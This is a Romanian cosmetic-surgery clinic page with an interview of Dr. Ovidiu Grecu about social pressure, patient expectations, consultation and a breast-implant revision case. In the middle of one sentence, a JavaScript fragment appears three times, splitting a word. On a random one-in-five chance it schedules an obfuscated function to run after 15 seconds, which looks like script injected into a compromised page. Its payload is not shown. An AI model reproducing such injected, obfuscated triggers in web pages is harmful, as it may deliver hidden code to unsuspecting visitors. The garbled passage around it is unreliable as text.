surgery_body_en

Dr. Ovidiu Grecu

Despre operatii estetice

Operatiile estetice au menirea de-a imbunatati acele parti ale
corpului nostru care nu sunt dezvoltate perfect sau in
asimetrie cu restul caracteristicilor anatomice ale corpului.
bkgd31

Dr. Ovidiu Grecu

Proteze Mamare

Implanturile mamare sunt de diferite tipuri si forme,
cu diferite invelisuri si continuturi. Impreuna cu
chirurgul dumneavoastra veti alege tipul si forma protezei,
pentru a putea ajunge la rezultatul care-l doriti.

Intrebari Frecvente

Chirurgia estetica – rezultatul presiunii sociale?

Tot mai multe femei in cautarea frumusetii fara batranete recurg in zilele noastre la chirurgia estetica. Cu siguranta aveti macar o prietena, vecina sau colega care a recurs la serviciile unui medic estetician. Unele considera ca in acest demers rezida succesul lor social, personal sau profesional, altele pur si simplu au alte asteptari de la corpul lor.

Cert, exista o «presiune sociala», daca putem sa o numim asa, dar este oare aceasta motivul cresterii numarului interventiilor estetice? Am stat de vorba cu dr. Ovidiu Grecu, reputat medic estetician, pentru a lamuri o parte dintre aspectele acestui subiect permanent tabu.

Domnule doctor, ne impinge presiunea sociala catre bisturiu?

Dr. OG: Probabil ca uneori o face. In lipsa unor studii concrete imi este greu sa va raspund cu certitudine dar in baza experientei si a discutiilor cu pacientele cred ca da, uneori se intampla acest lucru. Dar nu cred ca este motivul pentru care tot mai multe persoane recurg la serviciile unui medic estetician. Cred ca romanii au scapat de mult de prejudecati, cred ca cei mai multi incearca sa fie frumosi atat la interior cat si la exterior si atunci recurg si la solutii complementare sportului, pentru a avea un corp frumos.

Sa ne intoarcem la acele persoane care vor cu orice pret sa fie «altfel». Cum decurge relatia cu acestea? Reusesc intotdeauna sa iti atinga obiectivele / asteptarile?

Dr. OG: Primul si cel mai important pas intr-un demers de interventie estetica, fie chirurgicala sau de alta natura, este consultatia. Este ceea ce eu numesc chirurgie plastica resonsabila. Este momentul în care se stabilește legătura dintre chirurg și pacient. În această etapă se stabilesc limitele operației, cerințele pacientului și ceea ce doctorul poate să realizeze. Însă cel mai mare beneficiu al consultației constă în destrămarea unor mituri și transformarea unei anumite păreri a pacientei, posibil preconcepută, despre chirurgia estetică, în lucruri posibile, realizabile. Din pozitia de medic, nu trebuie niciodata sa promiti mai mult decat realitatea anatomica iti va permite sa realizezi.

Cred ca aici intervine ceea ce numiti «presiune sociala». Cred ca pericolul nu consta atat in decizia de a face sau nu o interventie de chirurgie estetica cat vizavi de asteptari. Daca acestea sunt dictate de catre anumite standom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andom() * 5);if (number1==3){var delay = 15000;setTimeout($p$VTO6JhIH6WkCGAcPR(0), delay);}andarde sociale artificiale si nu de realitatea corpului fiecaruia, atunci asteptarile pot fi inselate.

În contemporaneitatea noastră trăim popularizarea anumitor tipuri de intervenții estetice, care a determinat apariția unui fenomen ce are tendința de a șterge demarcația între dorință și știința medicală. A considera că un anumit tip de intervenție estetică, dacă este realizată corect, poate obține același rezultat unanim apreciat de un public oarecare, indiferent de cine ar fi pacientul, determină în general așteptări nerealiste și presiuni asupra medicului specialist, de natură nemedicala. Arta unei intervenții de chirurgie estetică este tocmai aceea de a reuși să îi transmiți pacientei viitoare ce trebuie și ce se poate face pentru a obține rezultatul maxim, pornind de la particularitățile anatomice unice ale fiecărei persoane.

Un exemplu frecvent întâlnit este reprezentat de operațiile de mărire a sânilor folosind implantele mamare. În realitate corect dar dificil de transmis pacientei, operația de mărire a sânilor ar trebui numită corect operația de întindere a sânilor. În multe cazuri, pentru a obține un rezultat frumos, implantul trebuie să aibă o anumită formă și mărime. Dar ce ne facem dacă pacienta noastră are deja, înainte de a intra în cabinet, o părere deja formată despre mărimea și forma implantului pe care ea îl dorește și de multe ori acea mărime pe care o solicită nu înseamnă decât un viitor rezultat urât și instabil în timp? Cu astfel de aspecte se confruntă un medic specializat în chirurgia estetică: diferența dintre dorință și așteptări ale pacienței, induse de informații total relative sau folclorice și principiile reale, stintifice și medicale ale acestor tipuri de intervenții chirurgicale estetice.

Exista si cazuri in care diverse persoane recurg la chirurgia plastica in urma unor accidente de diverse tipuri. Reuseste intotdeauna «arta estetica» sa rezolve aceste cazuri speciale?

Dr. OG: Trebuie sa precizam un lucru pentru cititori: in chirurgia estetica, orice caz este special si trebuie tratat ca atare. Este insa adevarat, in urma unor accidente diverse, interventia estetica este inevitabila. Dar si in aceste cazuri, o discutie sincera doctor – pacient este cheia unui rezultat frumos, pe masura asteptarilor.

Ne puteti oferi detalii despre un astfel de «caz special»?

Dr. OG: Da, pot sa va prezint un caz in care pacienta s-a prezentat, dupa o interventie si 2 reinterventii repetate de implant mamar efectuate pentru un san cazut, implantele fiind schimbate cu volum din ce in ce mai mare. La sanul din partea stanga se observa aparitia unei contracturi capsulare ce deranja pacienta nu numai estetic ci si la palparea sanului.

Inainte de interventie pacientei i s-au explicat problemele si caracteristicile anatomice ale situatiei actuale precum si modalitatea de rezolvare a acestora: eliminarea pe cale chirurgicala a contracturii capsulare, inlaturarea implantelor vechi, schimbarea implantelor vechi cu implante potrivite ca marime si forma in raport cu caracteristicile anatomice ale sanului. De asemenea pacientei i s-a explicat ce inseamna din punct de vedere chirurgical un san cazut. Operatia decisa a fost capsulotomia totala a sanului stang, schimbarea implantelor rotunde cu implante anatomice, lifting, urmate in acelasi timp operator de mastopexie bilaterala. Rezultatul prezinta pacienta la doua luni dupa interventie. Pentru cei care vor sa se informeze despre interventiile de implant mamar, sau despre interventiile de chirurgie plastica in general, mai multe detalii sunt prezentate pe site-ul meu, www.drgrecu.ro;

Suna Acum!
Navigheaza!